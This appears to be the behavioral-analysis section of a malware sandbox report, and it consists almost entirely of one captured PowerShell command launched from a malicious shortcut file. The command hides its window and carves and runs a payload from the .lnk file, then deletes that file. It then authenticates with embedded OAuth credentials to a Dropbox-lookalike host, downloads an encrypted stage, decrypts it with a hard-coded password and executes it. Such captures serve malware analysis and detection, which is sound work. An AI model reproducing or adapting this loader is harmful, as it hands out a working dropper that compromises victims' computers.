Behavioral Analysis

cmd.exe "C:\Windows\system32\cmd.exe" /c powershell -windowstyle hidden -nop -NoProfile -NonInteractive -c "$tmp = 'C:\Users\test22\AppData\Local\Temp';$lnkpath = Get-ChildItem *.lnk;foreach ($path in $lnkpath) { if ($path.length -eq 0x0010F27C) { $lnkpath = $path;}}foreach ($item in $lnkpath) { $lnkpath = $item.Name;}$InputStream = New-Object System.IO.FileStream($lnkpath, [IO.FileMode]::Open, [System.IO.FileAccess]::Read);$file=New-Object Byte[]($InputStream.length);$len=$InputStream.Read($file,0,$file.Length);$InputStream.Dispose();write-host \"readfileend\";$path = $lnkpath.substring(0,$lnkpath.length-4);$path1 = 'C:\Users\test22\AppData\Local\Temp\tmp' + (Get-Random) + '.vbs';$len1 = 1057248;$len2 = 1110496;$len3 = 1110496;$temp = New-Object Byte[]($len2-$len1);write-host \"exestart\";for($i=$len1; $i -lt $len2; $i++) { $temp[$i-$len1] = $file[$i]};sc $path ([byte[]]$temp) -Encoding Byte;write-host \"exeend\";$temp = New-Object Byte[]($file.Length-$len3);for($i=$len3; $i -lt $file.Length; $i++) { $temp[$i-$len3] = $file[$i]}; $encData_b64 = Start-Process -FilePath $path;[System.IO.File]::Delete($lnkpath);Function AESDecrypt { param ( [Byte[]]$bytes,[String]$pass=\"pa55w0rd\") $InputStream = New-Object System.IO.MemoryStream(,$bytes);$OutputStream = New-Object System.IO.MemoryStream;$Salt = New-Object Byte[](32);$BytesRead = $InputStream.Read($Salt, 0, $Salt.Length);if ( $BytesRead -ne $Salt.Length ) { exit;} $PBKDF2 = New-Object System.Security.Cryptography.Rfc2898DeriveBytes($pass, $Salt);$AESKey = $PBKDF2.GetBytes(32);$AESIV = $PBKDF2.GetBytes(16);$AES = New-Object Security.Cryptography.AesManaged;$Dec = $AES.CreateDecryptor($AESKey, $AESIV);$CryptoStream = New-Object System.Security.Cryptography.CryptoStream($InputStream, $Dec, [System.Security.Cryptography.CryptoStreamMode]::Read);$CryptoStream.CopyTo($OutputStream);$OutputStream.Dispose();return $OutputStream.ToArray();} $clientID = \"oj8kd1lzqrw7v3m\";$clientSecret = \"vwp27gytekx9jfq\";$refreshToken = \"wR3_ULk2OicAAAAAAAAAAV81-_COcFPa8SN0V5K-ZPTYB-BVIH5E1c4_fqLOCC_u\";$body = @{grant_type=\"refresh_token\";refresh_token=$refreshToken;client_id=$clientID;client_secret=$clientSecret};$tokenEndpoint = \"https://api.dr0pb0xapi.com/oauth2/token\";$response = Invoke-RestMethod -Uri $tokenEndpoint -Method Post -Body $body;if ($response.access_token) {$accessToken = $response.access_token;}$downloadUrl = \"https://content.dr0pb0xapi.com/2/files/download\";$remoteFilePath = \"/step5/ps.bin\";$request = [System.Net.HttpWebRequest]::Create($downloadUrl);$request.Method = \"POST\";$request.Headers.Add(\"Authorization\", \"Bearer $accessToken\");$request.Headers.Add(\"Dr0pb0x-API-Arg\", '{\"path\": \"' + $remoteFilePath + '\"}');$response = $request.GetResponse();$receiveStream = $response.GetResponseStream();$pass = \"pa55w0rd\";if ($receiveStream -ne $null) {$streamReader = New-Object System.IO.StreamReader($receiveStream);$memoryStream = New-Object System.IO.MemoryStream;$buffer = New-Object byte[] 1024;$read = 0;do { $read = $receiveStream.Read($buffer, 0, $buffer.Length);$memoryStream.Write($buffer, 0, $read);} while ($read -gt 0);$enc_bytes = $memoryStream.ToArray();$dec_bytes = AESDecrypt -bytes $enc_bytes -pass $pass;$newString = [System.Text.Encoding]::UTF8.GetString($dec_bytes);iex $newString;$memoryStream.Close();$streamReader.Close();};$receiveStream.Close();$response.Close();"